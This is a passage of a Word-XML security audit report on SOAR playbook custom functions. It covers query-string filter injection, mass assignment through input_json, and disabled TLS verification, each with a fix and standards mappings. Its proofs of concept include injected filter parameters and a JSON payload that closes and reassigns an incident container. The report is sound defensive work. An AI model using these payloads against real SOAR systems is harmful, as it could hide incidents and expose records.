          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>field_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filter_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; rarer for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>owner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). The SOAR REST layer, not a SQL DB, is the backend, so impact is scoped-query manipulation / information disclosure / wrong-record action rather than raw SQLi. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (local, string-building reproduction of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_update.py:46</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ python3 -I filter_injection.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'x"&amp;_filter_id__gt=0&amp;_x="' -&gt;</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https://soar.local/rest/ph_user?_filter_username="x"&amp;_filter_id__gt=0&amp;_x=""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>'x"&amp;page_size=0&amp;_exclude_automation=false&amp;="' -&gt;</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https://soar.local/rest/ph_user?_filter_username="x"&amp;page_size=0&amp;_exclude_automation=false&amp;=""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The injected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;_filter_id__gt=0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;page_size=0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> become live query parameters, breaking out of the intended single-username filter. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Never interpolate into the query string. Pass filter values via the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>params=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dict and URL-encode, and reject control characters. Example fixed owner→id lookup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from urllib.parse import quote</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>def _lookup_owner_id(phantom, owner):</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if not isinstance(owner, str) or any(c in owner for c in '&amp;="\n\r'):</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raise ValueError("invalid owner value")</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url = phantom.build_phantom_rest_url('ph_user')</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resp = phantom.requests.get(</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url,</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params={'_filter_username': '"{}"'.format(owner)},  # single param, lib-encoded</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verify=True,</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).json()</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data = resp.get('data') or []</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if len(data) == 1:</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return {'owner_id': data[0]['id']}</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>params=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> makes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> percent-encode the value so embedded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cannot add parameters; the explicit character reject blocks quote-breakout of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>__exact</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> expression. For </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find_related_containers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, additionally allowlist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>field_list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entries against a known set of CEF field names before building </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>_filter_cef__{k}</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-88 Improper Neutralization of Argument Delimiters in a Command (Argument Injection); CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection); CWE-20 Improper Input Validation (2024 CWE Top 25 #12). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1565.001 Data Manipulation: Stored Data Manipulation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-02 — container_update mass-assignment via input_json with no key allow-list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.5). Exploitability: Conditionally exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/container_update.py:71-78</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if input_json:</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json_dict = json.loads(input_json)</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update_dict = {**update_dict, **json_dict}   # no filtering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if update_dict:</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phantom.update(container, update_dict)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Unlike </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact_create.py</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>artifact_update.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (which enforce a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>valid_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allowlist), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_update</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> merges an arbitrary attacker-supplied JSON object straight into the container update payload. Any field the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/rest/container</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> endpoint accepts — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>owner_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>role_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sensitivity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>severity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>tags</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>custom_fields</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>container_type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — can be set. Combined with "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>input_json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> will take precedence" this also overrides the function's own typed parameters. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CEF/artifact JSON string → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>input_json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>json.loads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.update</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if a playbook maps attacker-influenced data (e.g. a JSON blob parsed from a phishing artifact) into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>input_json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Impact: unauthorized container field manipulation (reassign owner, downgrade severity, change status to hide an incident). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>input_json = '{"owner_id": 1, "status": "closed", "severity": "low"}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is merged verbatim and sent to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.update</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, closing/reassigning the container. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>CONTAINER_VALID_KEYS = {</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'name','description','label','owner_id','role_id','sensitivity',</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'severity','status','tags','custom_fields','container_type','due_time',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>if input_json:</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json_dict = json.loads(input_json)</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if not isinstance(json_dict, dict):</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raise ValueError("input_json must decode to an object")</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for k in list(json_dict):</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if k not in CONTAINER_VALID_KEYS:</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phantom.debug(f"dropping unsupported key: {k}")</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json_dict.pop(k)</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update_dict.update(json_dict)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Mirrors the allowlist already used by the artifact functions; preserves documented functionality (custom_fields still allowed) while blocking unexpected privileged fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-915 Improperly Controlled Modification of Dynamically-Determined Object Attributes (Mass Assignment); CWE-20 Improper Input Validation (2024 CWE Top 25 #12). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A08:2021 Software and Data Integrity Failures, A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1565 Data Manipulation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AC-3 Access Enforcement, SI-10 Information Input Validation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-03 — TLS verification disabled on every custom-function REST call (30+ sites)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.9). Exploitability: Not exploitable on loopback (defence-in-depth).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/*.py (e.g. artifact_create.py:112, container_merge.py:55-194, find_related_containers.py:47-237, workbook_task_update.py:101-160)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.requests.get/post</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> passes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>verify=False</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, disabling TLS certificate validation. On SOAR these calls normally target the loopback REST endpoint, which bounds real-world risk, but the pattern is copied uniformly and would transmit auth cookies/tokens and sensitive IR data without authentication of the server if the base URL is ever remote or proxied. It also suppresses urllib3 warnings and normalizes an insecure default across the codebase. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Not attacker-triggered; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable in the default loopback deployment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (defense-in-depth). Becomes exploitable (MITM of IR data / session tokens) only if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom.get_base_url()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resolves to a non-loopback host. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: n/a (configuration); the stub PoC output shows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>verify=False</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on every emitted request, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[REST GET] verify=False https://soar.local/rest/...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Rely on the platform's verified session or pass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>verify=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the SOAR CA is present in the appliance trust store). Where loopback self-signed certs are unavoidable, pin the CA bundle path rather than disabling verification:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>resp = phantom.requests.get(url, params=params, verify=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
